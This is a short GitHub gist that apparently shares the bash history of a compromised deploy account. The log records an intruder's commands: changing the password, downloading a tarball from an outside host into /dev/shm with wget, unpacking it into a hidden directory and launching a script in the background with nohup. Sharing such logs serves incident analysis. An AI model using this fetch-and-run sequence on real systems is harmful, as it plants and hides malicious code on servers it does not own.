Skip to content

Instantly share code, notes, and snippets.

@keeran
Created November 9, 2010 17:28
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save keeran/669440 to your computer and use it in GitHub Desktop.
Save keeran/669440 to your computer and use it in GitHub Desktop.
keeran@localhost:/home/deploy$ sudo cat .bash_history
passwd
cat /etc/issue
cd /dev/shm
ls
ls -la
wget rocsana4u.webs.com/joke/s.tgz
tar xvf s.tgz
rm -rf s.tgz
cd .joke/
nano clase.txt
chmod +x *
nohup ./doit.sh >>/dev/null &
ps -x
cd /dev/shm/.joke/
ls
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment